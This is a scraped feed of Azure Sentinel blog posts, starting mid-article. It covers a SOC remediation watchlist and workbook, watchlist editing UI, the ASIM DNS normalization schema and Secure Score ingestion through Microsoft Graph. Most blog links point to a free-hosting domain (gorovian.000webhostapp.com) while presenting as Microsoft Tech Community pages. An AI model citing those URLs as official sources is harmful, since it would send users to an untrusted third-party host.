<STRONG>S</STRONG>oc<STRONG>RA</STRONG> is case sensitive, you need an uppercase S, R and A.</P> <P><BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture3.png" style="width: 385px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289070iE1D07724F049D298/image-size/large?v=v2&amp;px=999" role="button" title="Picture3.png" alt="Picture3.png" /></span><BR />You should now have entries in Log Analytics for the SocRA alias.<BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture4.png" style="width: 429px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289072i1B08ACA93D605C2B/image-size/large?v=v2&amp;px=999" role="button" title="Picture4.png" alt="Picture4.png" /></span></P> <P>The SocRA watchlist .csv file serves both the Incident Overview Workbook and supports the Get-SOCActions Playbook, should you want to push Recommended Actions to the <STRONG>Comments</STRONG> section of the Incident your Analyst is working on. You will want to keep this in mind when you edit the SocRA watchlist. The Get-SOCActions Playbook leverages the formatting of the SocRA watchlist, i.e. A1 – A19, Alert, Date when querying the watchlist for Actions. If the alert is not found, or has not been onboarded, the Playbook then defaults to a set of questions pulled from the SOC Process Framework Workbook to help the analyst triage the alert &amp; Incident.</P> <P><STRONG>Important</STRONG> - Should you decide to add more steps to the watchlist .csv file beyond A1-A19 you will need to edit the Playbooks conditions to include the additional step(s) you added both in the JSON response, the KQL query, and the variable HTML formatting prior to committing the steps to the Incidents Comments section.</P> <P>&nbsp;</P> <H3><STRONG>Incident Overview Workbook</STRONG></H3> <P>To make Investigation easier, we have integrated the above Watchlist with the default “Investigation Overview” Workbook you see, just simply click on the normal link from within the Incident blade:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture5.png" style="width: 602px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289073iAAD2FCCAB11AF5EA/image-size/large?v=v2&amp;px=999" role="button" title="Picture5.png" alt="Picture5.png" /></span></P> <P>This will still open Workbook as usual.&nbsp; Whist I was making changes, I have also colour coded the alert <STRONG>status</STRONG> and <STRONG>severity</STRONG> fields (Red, Amber and Green), just to make them stand out a little, and Blue for new alerts.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture6.png" style="width: 602px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289074i668CEA84788259C7/image-size/large?v=v2&amp;px=999" role="button" title="Picture6.png" alt="Picture6.png" /></span></P> <P>If an alert has NO remediations, nothing will be visible in the workbook.&nbsp; However, if the alert has a remediation and there is no Watchlist called: SocRA then you will be able to expand the menu that will appear:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture7.png" style="width: 602px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289075iE0F3CC1765518219/image-size/large?v=v2&amp;px=999" role="button" title="Picture7.png" alt="Picture7.png" /></span></P> <P>This will show the default or basic remediations that the alert has, in this example there are 3 remediation steps shown.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture8.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289076i9964CA8EBA1DF6C2/image-size/large?v=v2&amp;px=999" role="button" title="Picture8.png" alt="Picture8.png" /></span></P> <P>If you <STRONG>have</STRONG> the <STRONG>SocRA</STRONG> watchlist installed, then you will see that data shown <EM>instead</EM> (as the Watchlist is the authoritative source, rather than the steps in the alert).&nbsp; In this example there is a 4<SUP>th</SUP> step (A4) shown, which is specific to the Watchlist and the specific alert called “Suspicious authentication activity”.<BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture9.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289077iBA2849F94CA375F4/image-size/large?v=v2&amp;px=999" role="button" title="Picture9.png" alt="Picture9.png" /></span></P> <P>&nbsp;</P> <H3><STRONG>Conclusion </STRONG></H3> <P>In conclusion, these Workbooks, the Playbook, and Watchlist all work together in concert to provide you with a customized solution to creating remediation steps that are tailored to a specific line of business. As you on-board custom analytics/detections that are pertinent to your business, you will have actions you will want an analyst to take and this solution provides a mechanism for delivering the right actions per analytic/use-case.</P> <H3><STRONG><BR />Thanks for reading!</STRONG></H3> <P>We hope you found the details of this article interesting. Thanks <STRONG>Clive</STRONG> <STRONG>Watson</STRONG> and <STRONG>Rin</STRONG> <STRONG>Ure</STRONG> for writing this Article and creating the content for this solution.</P> <P>And a special thanks to <STRONG>Sarah Young</STRONG> and <STRONG>Liat Lisha</STRONG> for helping us to deploy this solution.</P> <H3><STRONG><BR />Links</STRONG></H3> <P><STRONG>&nbsp;</STRONG></P> <TABLE> <THEAD> <TR> <TD width="210"> <P><STRONG>Content</STRONG></P> </TD> <TD width="392"> <P><STRONG>Link</STRONG></P> </TD> </TR> </THEAD> <TBODY> <TR> <TD width="210"> <P>SOC process Framework Wiki <A href="#" target="_blank" rel="noopener">SOC Process Framework · Azure/Azure-Sentinel Wiki (github.com)</A></P> <P>&nbsp;</P> <P>Main SOC Process Framework Blog, author Rin Ure</P> </TD> <TD width="392"> <P><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-soc-process-framework-workbook/ba-p/2339315" target="_blank" rel="noopener">https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-soc-process-framework-workbook/ba-p/2339315</A></P> </TD> </TR> <TR> <TD width="210"> <P>SOC Process Framework Workbook, author Rin Ure</P> </TD> <TD width="392"> <P><A href="#" target="_blank" rel="noopener">https://github.com/Azure/Azure-Sentinel/blob/master/Workbooks/SOCProcessFramework.json</A></P> </TD> </TR> <TR> <TD width="210"> <P>Incident Overview Workbook, amended by Clive Watson for remediation and watchlist integration</P> </TD> <TD width="392"> <P><A href="#" target="_blank" rel="noopener">https://github.com/Azure/Azure-Sentinel/blob/master/Workbooks/IncidentOverview.json</A></P> </TD> </TR> <TR> <TD width="210"> <P>Watchlist, author Rin Ure</P> </TD> <TD width="392"> <P><A href="#" target="_blank" rel="noopener">https://github.com/Azure/Azure-Sentinel/blob/master/docs/SOCAnalystActionsByAlert.csv</A></P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> Wed, 16 Jun 2021 21:13:09 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/enhanced-azure-sentinel-alert-remediation-in-the-soc-process/ba-p/2452430 Clive Watson 2021-06-16T21:13:09Z What’s New: Azure Sentinel Update Watchlist UI Enhancements https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-update-watchlist-ui-enhancements/ba-p/2451476 <P><EM>This blog post is a collaboration between&nbsp;</EM><A href="https://gorovian.000webhostapp.com/?exam=t5/user/viewprofilepage/user-id/87823" target="_blank" rel="noopener"><EM>@Cristhofer Munoz</EM></A><EM>&nbsp;and&nbsp;</EM><A href="https://gorovian.000webhostapp.com/?exam=t5/user/viewprofilepage/user-id/301871" target="_blank" rel="noopener"><EM>@JulianGonzalez</EM></A><EM>&nbsp;</EM></P> <P>&nbsp;</P> <P><EM>This installment is part of a broader series to keep you up to date with the latest features/enhancements in Azure Sentinel. The installments will be bite-sized to enable you to easily digest the new content.</EM></P> <P><EM>&nbsp;</EM></P> <H2><STRONG>Introduction</STRONG></H2> <P><STRONG>&nbsp;</STRONG></P> <P>Security operations (SecOps) teams need to be equipped with the tools that empower them to efficiently detect, investigate, and respond to threats across your enterprise. Azure Sentinel watchlists empower organizations to shorten investigation cycles and enable rapid threat remediation by providing the ability to collect external data sources for correlation with security events. Additionally, correlations and analytics help SecOps stay appraised of bad actors and compromised entities across the environment. Incorporating external data and performing correlation across analytics allows security teams to get a better view of their entire infrastructure and take steps to reduce risk.</P> <P>&nbsp;</P> <P>Due to evolving and constant change in the cybersecurity landscape that we live in, it is very challenging for SecOps to stay appraised of new indicators of compromise.</P> <P>&nbsp;</P> <P>Azure Sentinel Watchlists provides the ability to &nbsp;quickly import IP addresses, file hashes, etc. from csv files into your Azure Sentinel workspace.&nbsp; Then utilize the watchlist name/value pairs for joining and filtering for use in alert rules, threat hunting, workbooks, notebooks and for general queries.</P> <P>&nbsp;</P> <P>Due to the constant change, security analysts need the flexibility to update watchlists to stay ahead. With that in mind, &nbsp;we are super excited to announce the Azure Sentinel Watchlist &nbsp;enhancements that empower security analysts to drive efficiency by enabling the ability to update or add items to a watchlist using an intuitive user interface.</P> <P>&nbsp;</P> <P>---------------------------------------------------------------------</P> <P>For additional use case examples, please refer to these relevant blog posts:</P> <P>&nbsp;</P> <P>Utilize Watchlists to Drive Efficiency during Azure Sentinel Investigations:</P> <P><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/utilize-watchlists-to-drive-efficiency-during-azure-sentinel/ba-p/2090711" target="_blank" rel="noopener">Utilize Watchlists to Drive Efficiency During Azure Sentinel Investigations - Microsoft Tech Community</A></P> <P>&nbsp;</P> <P>Playbooks &amp; Watchlists Part 1: Inform the subscription owner</P> <P><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/playbooks-amp-watchlists-part-1-inform-the-subscription-owner/ba-p/1768917" target="_blank" rel="noopener">https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/playbooks-amp-watchlists-part-1-inform-the-sub...</A></P> <P>&nbsp;</P> <P>Playbooks &amp; Watchlists Part 2: Automate incident response</P> <P><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/playbooks-amp-watchlists-part-2-automate-incident-response-for/ba-p/1771676" target="_blank" rel="noopener">https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/playbooks-amp-watchlists-part-2-automate-incid...</A></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Please refer to our public documentation for other&nbsp;</SPAN><A href="#" target="_blank" rel="noopener noreferrer"><SPAN data-contrast="none">additional details</SPAN></A><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P>---------------------------------------------------------------------</P> <P>&nbsp;</P> <H2>Watchlist Updating Functionality</H2> <P>&nbsp;</P> <P>The new watchlist UI encompasses the following functionality:</P> <P>- Add new watchlist items or update existing watchlist items.</P> <P>- Select and update multiple watchlist items at once via an Excel-like grid.</P> <P>- Add/remove columns from the watchlist update UI view for better usability.</P> <P>&nbsp;</P> <H3>How to update watchlist</H3> <P><SPAN data-contrast="none">From the Azure portal, navigate to </SPAN><STRONG><SPAN data-contrast="none">Azure Sentinel</SPAN></STRONG><SPAN data-contrast="none"> &gt; </SPAN><STRONG><SPAN data-contrast="none">Configuration</SPAN></STRONG><SPAN data-contrast="none"> &gt; </SPAN><STRONG><SPAN data-contrast="none">Watchlist</SPAN></STRONG><SPAN data-contrast="none"> </SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="none"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="watchlist.jpg" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289001i21DCB8CA6AA6C896/image-size/large?v=v2&amp;px=999" role="button" title="watchlist.jpg" alt="watchlist.jpg" /></span></SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-contrast="none">Select a&nbsp;<STRONG>Watchlist,&nbsp;</STRONG>then select&nbsp;<STRONG>Edit Watchlist Items</STRONG></SPAN></P> <DIV id="tinyMceEditorCristhofer Munoz_0" class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV> <P>&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="watchlist2.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289007iEF4FDAAD95126FFF/image-size/large?v=v2&amp;px=999" role="button" title="watchlist2.png" alt="watchlist2.png" /></span></P> <P>&nbsp;</P> <P>Select &gt;&nbsp;<STRONG>Add New</STRONG>, update watchlist parameters</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="addnew.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/289009iDC70CA5DAF41F6A7/image-size/large?v=v2&amp;px=999" role="button" title="addnew.gif" alt="addnew.gif" /></span></P> <P>&nbsp;</P> <H2 id="toc-hId-1758710297">Get started today!</H2> <P>&nbsp;</P> <P>We encourage you to try out the new Wachlist update UI enhancement to drive efficiency across your data correlation.</P> <P>&nbsp;</P> <P>Try it out, and<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/bd-p/AzureSentinel" target="_blank" rel="noopener" data-event="page-clicked-link" data-bi-id="page-clicked-link" data-bi-area="content">&nbsp;let us know</A>&nbsp;what you think!</P> <P>&nbsp;</P> Wed, 16 Jun 2021 21:32:53 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-update-watchlist-ui-enhancements/ba-p/2451476 Cristhofer Munoz 2021-06-16T21:32:53Z What's new: Azure Sentinel Information Model DNS Schema and normalized content now public https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-information-model-dns-schema-and/ba-p/2429926 <P>I’m excited to announce the second step in our normalization journey. Following our networking schema, we now extend our <A href="#" target="_self">Azure Sentinel Information Model (ASIM) guidance</A> and release our <A href="#" target="_self">DNS schema</A>. We expect to follow suit with additional schemas in the coming weeks.</P> <P>&nbsp;</P> <P>Special thanks to <STRONG>Yaron Fruchtmann</STRONG> and <STRONG>Batami Gold</STRONG>, who made all this possible.</P> <P>&nbsp;</P> <P>This release includes additional artifacts to ensure easier use of ASIM:</P> <P>&nbsp;</P> <UL> <LI>New extensive <A href="#" target="_self">overview of the Azure Sentinel Information Model (ASIM)</A>, including schema guidelines and a parser writing guide.</LI> </UL> <P>&nbsp;</P> <UL> <LI>All the normalizing parsers can be deployed in a click using an <A href="#" target="_self">ARM template</A>. The initial release contains normalizing parsers for Infoblox, Cisco Umbrella, and Microsoft DNS server.</LI> </UL> <P>&nbsp;</P> <UL> <LI>We have migrated analytic rules that worked on a single DNS source to use the normalized template. Those are available in GitHub and will be available in the in product gallery in the coming days. You can find the list at the end of this post.</LI> </UL> <P>&nbsp;</P> <UL> <LI>And of course, the <A href="#" target="_self">schema documentation</A> is available on docs.microsoft.com.</LI> </UL> <P>&nbsp;</P> <P>With a single click deployment and support for normalized content in analytic rules, we believe we will see an accelerated adaption of the Azure Sentinel Information Model.</P> <P>&nbsp;</P> <P>Join us to learn more about Azure Sentinel information model in <A href="#" target="_self">two webinars</A>:</P> <UL> <LI><STRONG>The Information Model: Understanding Normalization in Azure Sentinel</STRONG></LI> <LI><STRONG>Deep Dive into Azure Sentinel Normalizing Parsers and Normalized Content</STRONG></LI> </UL> <P>&nbsp;</P> <H2>Why normalization, and what is the Azure Sentinel Information Model?</H2> <P><BR />Working with various data types and tables together presents a challenge. You must become familiar with many different data types and schemas, write and use a unique set of analytics rules, workbooks, and hunting queries for each, even for those that share commonalities (for example, DNS servers). Correlation between the different data types necessary for investigation and hunting is also tricky.</P> <P><BR />The Azure Sentinel Information Model (ASIM) provides a seamless experience for handling various sources in uniform, normalized views. ASIM aligns with the Open-Source Security Events Metadata (OSSEM) common information model, promoting vendor agnostic, industry-wide normalization. ASIM:</P> <P>&nbsp;</P> <UL> <LI>Allows source agnostic content and solutions</LI> <LI>Simplifies analyst use of the data in sentinel workspaces</LI> </UL> <P>&nbsp;</P> <P>The current implementation is based on query time normalization using KQL functions. And includes the following:</P> <P>&nbsp;</P> <UL> <LI>Normalized schemas cover standard sets of predictable event types that are easy to work with and build unified capabilities. The schema defines which fields should represent an event, a normalized column naming convention, and a standard format for the field values.</LI> <LI>Parsers map existing data to the normalized schemas. Parsers are implemented using KQL functions.</LI> <LI>Content for each normalized schema includes analytics rules, workbooks, hunting queries, and additional content. This content works on any normalized data without the need to create source-specific content.<BR /><BR /></LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="POWERPNT_kovE7KHr8z.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/287436i766C13090426B7A7/image-size/large?v=v2&amp;px=999" role="button" title="POWERPNT_kovE7KHr8z.png" alt="POWERPNT_kovE7KHr8z.png" /></span></P> <P>&nbsp;</P> <H2>Why normalize DNS data?</H2> <P>&nbsp;</P> <P>ASIM is especially useful for DNS. Different DNS servers and DNS security solutions such as Infoblox, Cisco Umbrella &amp; Microsoft DNS server provide highly non-standard logs, representing similar information, namely the DNS protocol. Using normalization, standard, source agnostic content can apply to all DNS servers without customizing it to each DNS server. In addition, an analyst investigating an incident can query the DNS data in the system without specific knowledge of the source providing it.</P> <P>&nbsp;</P> <H2>Analytic Rules added or updated to work with ASim DNS</H2> <UL> <LI>Added: <UL> <LI>Excessive NXDOMAIN DNS Queries (Normalized DNS)</LI> <LI>DNS events related to mining pools (Normalized DNS)</LI> <LI>DNS events related to ToR proxies (Normalized DNS)</LI> </UL> </LI> <LI>Updated to include normalized DNS: <UL> <LI>Known Barium domains</LI> <LI>Known Barium IP addresses</LI> <LI>Exchange Server Vulnerabilities Disclosed March 2021 IoC Match</LI> <LI>Known GALLIUM domains and hashes</LI> <LI>Known IRIDIUM IP</LI> <LI>NOBELIUM - Domain and IP IOCs - March 2021</LI> <LI>Known Phosphorus group domains/IP</LI> <LI>Known STRONTIUM group domains - July 2019</LI> <LI>Solorigate Network Beacon</LI> <LI>THALLIUM domains included in DCU takedown</LI> <LI>Known ZINC Comebacker and Klackring malware hashes</LI> </UL> </LI> </UL> Tue, 15 Jun 2021 18:55:32 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-information-model-dns-schema-and/ba-p/2429926 Ofer_Shezaf 2021-06-15T18:55:32Z Microsoft Defender Security Insights in Azure Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/microsoft-defender-security-insights-in-azure-sentinel/ba-p/2359705 <P><STRONG>Overview</STRONG></P> <P>&nbsp;</P> <P><SPAN>Thanks to <LI-USER uid="572591"></LI-USER>&nbsp;(Program Manager - Azure Sentinel) and <LI-USER uid="329567"></LI-USER>&nbsp; (Program Manager - Azure Sentinel) for the technical brainstorming, contribution, implementation and proof reading!&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN>Microsoft Secure score is a security analytics solution that gives you visibility into your security portfolio and how to improve it. Azure Sentinel is a SaaS Security Information and Event Management solution providing visibility and management of the threats in an environment.&nbsp; The following blog shows how you can leverage Azure Sentinel to gain visibility into Microsoft Secure Score alongside other security data.&nbsp;&nbsp;</SPAN></P> <P>&nbsp;</P> <P><STRONG>Requirements</STRONG><STRONG>&nbsp;&amp; Use Cases</STRONG></P> <P>&nbsp;</P> <P>SOC team want to pull and ingest Microsoft Secure Score data, recommendations, profiles, Azure Defender&nbsp;<SPAN class="TextRun SCXW200176847 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW200176847 BCX8" data-ccp-parastyle="No Spacing">,</SPAN><SPAN class="NormalTextRun SCXW200176847 BCX8" data-ccp-parastyle="No Spacing"><SPAN>&nbsp;</SPAN>Microsoft 365, Microsoft Defender for Endpoint, and Microsoft Cloud App Security data</SPAN></SPAN><SPAN class="EOP SCXW200176847 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN>to Azure Sentinel for further investigation, compliance and hygiene security purpose to have a consolidated unified security posture view in addition to the following use cases:</P> <P>&nbsp;</P> <UL> <LI>Monitor, track and report on their organization configuration baseline and score in downstream reporting tools.</LI> <LI>Integrate the data into compliance or cybersecurity insurance applications.</LI> <LI>Integrate Secure Score data to drive a hybrid or multi-cloud framework for security analytics.</LI> </UL> <P>&nbsp;</P> <P><STRONG>Microsoft Secure Score</STRONG></P> <P>&nbsp;</P> <P>Microsoft&nbsp;Secure Score helps organizations:</P> <UL> <LI>Report on the current state of the organization's security posture.</LI> <LI>Improve their security posture by providing discoverability, visibility, guidance, and control.</LI> <LI>Compare with benchmarks and establish key performance indicators (KPIs).</LI> </UL> <P>To help you find the information you need more quickly, Microsoft improvement actions are organized into groups:</P> <UL> <LI>Identity (Azure Active Directory accounts, roles, Microsoft Defender for Identity)</LI> <LI>Device (Microsoft Defender for Endpoint)</LI> <LI>Apps (email and cloud apps, including Office 365 &amp; Microsoft Cloud App Security)</LI> </UL> <P><SPAN>In the <A href="#" target="_self">Microsoft Secure Score overview</A> page (under the Microsoft 365 Security Portal), view how points are split between these groups and what points are available. You can also get an all-up view of the total score, historical trend of your secure score with benchmark comparisons, and prioritized improvement actions that can be taken to improve your score:</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="securescore1.PNG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/280998i4F2734B6FE26317A/image-size/large?v=v2&amp;px=999" role="button" title="securescore1.PNG" alt="securescore1.PNG" /></span></P> <P>&nbsp;</P> <P>You're given points for the following actions:</P> <UL> <LI>Configuring recommended security features</LI> <LI>Doing security-related tasks</LI> <LI>Addressing the improvement action with a third-party application or software, or an alternate mitigation</LI> </UL> <P>The following are scores you can add to your view of your overall score to give you a fuller picture of your overall score:</P> <UL> <LI><STRONG>Planned score</STRONG>: Show projected score when planned actions are completed</LI> <LI><STRONG>Current license score</STRONG>: Show score that can be achieved with your current Microsoft license</LI> <LI><STRONG>Achievable score</STRONG>: Show score that can be achieved with your Microsoft licenses and current risk acceptance</LI> </UL> <P><SPAN>Your score is updated in real time to reflect the information presented in the visualizations and improvement action pages. Secure Score also syncs daily to receive system data about your achieved points for each action.</SPAN></P> <P>&nbsp;</P> <P>For more details, please visit&nbsp;<A href="#" target="_self">Assess your security posture with Microsoft Secure Score&nbsp;</A>&amp; <A href="#" target="_self">Microsoft Secure Score</A></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Implementing Secure Score data into Azure Sentinel</STRONG></P> <P>&nbsp;</P> <P>The Security API in Microsoft Graph makes it easy to connect with Microsoft Secure Score in the Intelligent Security Graph. It allows you to more readily realize and enrich the value of these solutions.</P> <P>&nbsp;</P> <P><SPAN>Acquiring the <A href="#" target="_self">Secure Score data from the API</A> requires you to setup a few pre-requisites:</SPAN></P> <P>&nbsp;</P> <UL> <LI><SPAN>1st, you should choose your consumption model. If you plan to have a non-user-interactive application to retrieve data from the API, you should opt for the <A href="#" target="_self">Service-To-Service Authentication model,</A>&nbsp;</SPAN><SPAN>If your application will require an administrator to provide their logon credentials each time you pull data from the API, you should opt for the user OAuth model. Reference information about this model is located&nbsp;<A href="#" target="_blank" rel="noopener noreferrer">here</A>. If you are a CSP application developer partner you can also find information&nbsp;<A href="#" target="_blank" rel="noopener noreferrer">here</A>.</SPAN></LI> <LI>2nd, you will need to <A href="#" target="_self">register</A> your application in Azure Active Directory in order to call the API. You need to grant the SecurityEvents.Read.All and SecurityEvents.ReadWrite.All permission scopes.&nbsp;</LI> </UL> <H4 aria-level="3">&nbsp;</H4> <P>Below is the list of Secure Score exposed APIs:</P> <P>&nbsp;</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="33.333333333333336%"><SPAN>List secure scores</SPAN></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="relative-path">List secureScores</A></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="external">https://graph.microsoft.com/v1.0/security/secureScores</A></TD> </TR> <TR> <TD width="33.333333333333336%"><SPAN>Get secure score</SPAN></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="relative-path">Get secureScore</A></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="external">https://graph.microsoft.com/v1.0/security/secureScores/{id}</A></TD> </TR> <TR> <TD width="33.333333333333336%"><SPAN>List secure score control profiles</SPAN><SPAN><BR /></SPAN></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="relative-path">List secureScoreControlProfiles</A></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="external">https://graph.microsoft.com/v1.0/security/secureScoreControlProfiles</A></TD> </TR> <TR> <TD><SPAN>Get secure score control profile</SPAN></TD> <TD><A href="#" target="_blank" rel="noopener" data-linktype="relative-path">Get secureScoreControlProfile</A></TD> <TD><A href="#" target="_blank" rel="noopener" data-linktype="external">https://graph.microsoft.com/v1.0/security/secureScoreControlProfiles/{id}</A></TD> </TR> <TR> <TD><SPAN>Update secure score control profiles</SPAN><SPAN><BR /></SPAN></TD> <TD><A href="#" target="_blank" rel="noopener" data-linktype="relative-path">Update secureScoreControlProfile</A></TD> <TD><A href="#" target="_blank" rel="noopener" data-linktype="external">https://graph.microsoft.com/v1.0/security/secureScoreControlProfiles/{id}</A></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <H4 id="toc-hId-679041080" aria-level="3"><SPAN data-contrast="none">Step(1): Register an App</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H4> <P><SPAN data-contrast="auto">Create and register Azure AD App to&nbsp;</SPAN><SPAN data-contrast="auto">handle&nbsp;the aut</SPAN><SPAN data-contrast="auto">hentication and authorization&nbsp;to collect the Secure Score data from&nbsp;the Graph API and Microsoft Defender for Endpoint API.</SPAN><SPAN data-contrast="auto">&nbsp;Here are the steps -&nbsp;</SPAN><SPAN data-contrast="auto">navigate&nbsp;to&nbsp;the Azure Active Directory blade of your Azure portal and</SPAN><SPAN data-contrast="auto">&nbsp;follow&nbsp;the steps below:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <OL class="lia-list-style-type-lower-alpha"> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Click on&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">App Registrations</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Select&nbsp;‘</SPAN><SPAN data-contrast="auto">New Registration</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Give it&nbsp;a name and c</SPAN><SPAN data-contrast="auto">lick Register.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">API Permissions</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-contrast="auto">b</SPAN><SPAN data-contrast="auto">lade.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">Add a Permission</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto">.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><STRONG>Microsoft Graph</STRONG><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto">.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Click </SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">Application</SPAN><SPAN data-contrast="auto"> Permissions</SPAN><SPAN data-contrast="auto">’.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN 